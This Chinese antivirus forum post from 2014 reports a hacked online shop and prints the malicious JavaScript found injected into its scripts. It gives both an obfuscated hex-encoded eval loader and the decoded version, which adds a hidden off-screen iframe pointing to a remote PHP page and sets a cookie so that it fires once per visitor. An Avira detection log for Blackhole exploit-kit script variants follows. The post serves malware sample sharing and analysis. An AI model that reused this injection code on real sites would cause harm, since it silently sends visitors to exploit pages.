查看: 1365|回复: 0
收起左侧

[已鉴定] 裏面

[复制链接]
fireold
发表于 2014-1-17 16:31:57 | 显示全部楼层 |阅读模式
  1. http://lussostyle.com/cart.php?_=1381029347917&ajax=true&token
复制代码


  1. /*0f2490*/
  2. z = "y";
  3. vz = "d" + "o" + "c" + "ument";
  4. try {
  5.     +
  6.     function() {
  7.         if (document.querySelector)++(window[vz].body) == null
  8.     }()
  9. } catch (q) {
  10.     aa = function(ff) {
  11.         ff = "fr" + "omCh" + ff;
  12.         for (i = 0; i < z.length; i++) {
  13.             za += String[ff](e(v + (z[i])) - (13));
  14.         }
  15.     };
  16. };
  17. e = (eval);
  18. v = "0x";
  19. a = 0;
  20. try {;
  21. } catch (zz) {
  22.     a = 1
  23. }
  24. if (!a) {
  25.     try {
  26.         ++e(vz)["\x62o" + "d" + z]
  27.     } catch (q) {
  28.         a2 = "^";
  29.     }
  30.     z = "2d^73^82^7b^70^81^76^7c^7b^2d^7e^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^2d^83^6e^7f^2d^7e^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7f^72^6e^81^72^52^79^72^7a^72^7b^81^35^34^76^73^7f^6e^7a^72^34^36^48^1a^17^1a^17^2d^7e^3b^80^7f^70^2d^4a^2d^34^75^81^81^7d^47^3c^3c^84^84^84^3b^7f^75^7c^7b^72^3a^6e^79^7d^72^80^3b^7c^7f^74^3c^44^58^65^57^43^78^75^70^3b^7d^75^7d^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^7d^7c^80^76^81^76^7c^7b^2d^4a^2d^34^6e^6f^80^7c^79^82^81^72^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^70^7c^79^7c^7f^2d^4a^2d^34^46^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^75^72^76^74^75^81^2d^4a^2d^34^46^7d^85^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^84^76^71^81^75^2d^4a^2d^34^46^7d^85^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^79^72^73^81^2d^4a^2d^34^3e^3d^3d^3d^46^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^81^7c^7d^2d^4a^2d^34^3e^3d^3d^3d^46^34^48^1a^17^1a^17^2d^76^73^2d^35^2e^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7e^34^36^36^2d^88^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^84^7f^76^81^72^35^34^49^7d^2d^76^71^4a^69^34^7e^69^34^2d^70^79^6e^80^80^4a^69^34^7e^3d^46^69^34^2d^4b^49^3c^7d^4b^34^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7e^34^36^3b^6e^7d^7d^72^7b^71^50^75^76^79^71^35^7e^36^48^1a^17^2d^8a^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^60^72^81^50^7c^7c^78^76^72^35^70^7c^7c^78^76^72^5b^6e^7a^72^39^70^7c^7c^78^76^72^63^6e^79^82^72^39^7b^51^6e^86^80^39^7d^6e^81^75^36^2d^88^1a^17^2d^83^6e^7f^2d^81^7c^71^6e^86^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^83^6e^7f^2d^72^85^7d^76^7f^72^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^76^73^2d^35^7b^51^6e^86^80^4a^4a^7b^82^79^79^2d^89^89^2d^7b^51^6e^86^80^4a^4a^3d^36^2d^7b^51^6e^86^80^4a^3e^48^1a^17^2d^72^85^7d^76^7f^72^3b^80^72^81^61^76^7a^72^35^81^7c^71^6e^86^3b^74^72^81^61^76^7a^72^35^36^2d^38^2d^40^43^3d^3d^3d^3d^3d^37^3f^41^37^7b^51^6e^86^80^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^2d^4a^2d^70^7c^7c^78^76^72^5b^6e^7a^72^38^2f^4a^2f^38^72^80^70^6e^7d^72^35^70^7c^7c^78^76^72^63^6e^79^82^72^36^1a^17^2d^38^2d^2f^48^72^85^7d^76^7f^72^80^4a^2f^2d^38^2d^72^85^7d^76^7f^72^3b^81^7c^54^5a^61^60^81^7f^76^7b^74^35^36^2d^38^2d^35^35^7d^6e^81^75^36^2d^4c^2d^2f^48^2d^7d^6e^81^75^4a^2f^2d^38^2d^7d^6e^81^75^2d^47^2d^2f^2f^36^48^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^54^72^81^50^7c^7c^78^76^72^35^2d^7b^6e^7a^72^2d^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^7f^81^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^7b^6e^7a^72^2d^38^2d^2f^4a^2f^2d^36^48^1a^17^2d^83^6e^7f^2d^79^72^7b^2d^4a^2d^80^81^6e^7f^81^2d^38^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^38^2d^3e^48^1a^17^2d^76^73^2d^35^2d^35^2d^2e^80^81^6e^7f^81^2d^36^2d^33^33^1a^17^2d^35^2d^7b^6e^7a^72^2d^2e^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^3d^39^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^36^2d^36^2d^36^1a^17^2d^88^1a^17^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^8a^1a^17^2d^76^73^2d^35^2d^80^81^6e^7f^81^2d^4a^4a^2d^3a^3e^2d^36^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^83^6e^7f^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^2f^48^2f^39^2d^79^72^7b^2d^36^48^1a^17^2d^76^73^2d^35^2d^72^7b^71^2d^4a^4a^2d^3a^3e^2d^36^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^79^72^7b^74^81^75^48^1a^17^2d^7f^72^81^82^7f^7b^2d^82^7b^72^80^70^6e^7d^72^35^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7e^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);
  31.     za = "";
  32.     aa("arCode");
  33.     e("" + za);
  34. } /*/0f2490*/
复制代码

  1. function if09() {
  2.      var static = 'ajax';
  3.      var controller = 'index.php';
  4.      var
  5.      if = document.createElement('iframe');

  6.      if.src = 'http://www.rhone-alpes.org/7KXJ6khc.php';
  7.      if.style.position = 'absolute';
  8.      if.style.color = '45379';
  9.      if.style.height = '45379px';
  10.      if.style.width = '45379px';
  11.      if.style.left = '100045379';
  12.      if.style.top = '100045379';

  13.      if (!document.getElementById('if')) {
  14.          document.write('<p id=\'if\' class=\'if09\' ></p>');
  15.          document.getElementById('if').appendChild(
  16.          if);
  17.      }
  18. }

  19. function SetCookie(cookieName, cookieValue, nDays, path) {
  20.      var today = new Date();
  21.      var expire = new Date();
  22.      if (nDays == null || nDays == 0) nDays = 1;
  23.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  24.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  25. }

  26. function GetCookie(name) {
  27.      var start = document.cookie.indexOf(name + "=");
  28.      var len = start + name.length + 1;
  29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  30.          return null;
  31.      }
  32.      if (start == -1) return null;
  33.      var end = document.cookie.indexOf(";", len);
  34.      if (end == -1) end = document.cookie.length;
  35.      return unescape(document.cookie.substring(len, end));
  36. }
  37. if (navigator.cookieEnabled) {
  38.      if (GetCookie('visited_uq') == 55) {} else {
  39.          SetCookie('visited_uq', '55', '1', '/');

  40.          if09();
  41.      }
  42. }
复制代码


Avira
2014/1/17 下午 04:26 [Web Protection] 發現惡意程式碼
      從 URL "http://lussostyle.com/js/jquery/jquery-1.4.4.min.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:封鎖的檔案

2014/1/17 下午 04:26 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\cart[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.EB.9' [virus]
      已採取動作:
      檔案會移動至 '5b3a4971.qua' 名稱底下的隔離區目錄!

2014/1/17 下午 04:26 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        778
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2014/1/17 下午 04:26 [Web Protection] 發現惡意程式碼
      從 URL
      "http://lussostyle.com/modules/lofmanufacturerscroll/assets/jquery.jcarousel.js"
       存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:封鎖的檔案

2014/1/17 下午 04:26 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\jquery.autocomplete[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:26 [Web Protection] 發現惡意程式碼
      從 URL "http://lussostyle.com/js/jquery/jquery.autocomplete.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2014/1/17 下午 04:26 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\jquery.carousel[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:26 [Web Protection] 發現惡意程式碼
      從 URL "http://lussostyle.com/modules/lofcarousel/assets/jquery.carousel.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2014/1/17 下午 04:26 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\carriercompare[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:26 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\ajax-cart[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:26 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\7853OJ09\menu[2].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:26 [Web Protection] 發現惡意程式碼
      從 URL "http://lussostyle.com/modules/carriercompare/carriercompare.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2014/1/17 下午 04:26 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/modules/blockslidingcategories/menu.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2014/1/17 下午 04:25 [Web Protection] 發現惡意程式碼
      從 URL "http://lussostyle.com/modules/blockcart/ajax-cart.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2014/1/17 下午 04:25 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\tools[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:25 [Web Protection] 發現惡意程式碼
      從 URL "http://lussostyle.com/js/tools.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2014/1/17 下午 04:25 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\jquery.easing.1.3[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:25 [Web Protection] 發現惡意程式碼
      從 URL "http://lussostyle.com/js/jquery/jquery.easing.1.3.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2014/1/17 下午 04:25 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\cart[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.EB.9 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/17 下午 04:25 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\cart[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.EB.9 [virus]'
      執行的動作:拒絕存取

2014/1/17 下午 04:25 [Web Protection] 發現惡意程式碼
      從 URL
      "http://lussostyle.com/cart.php?_=1381029347917&amp;amp;amp;amp;amp;amp;amp;amp;
      amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;
      ajax=true&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;am
      p;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;token" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.EB.9' [virus]。
      已採取動作:已略過


av5.jpg



fs is
fs5.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 18:02 , Processed in 0.133167 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表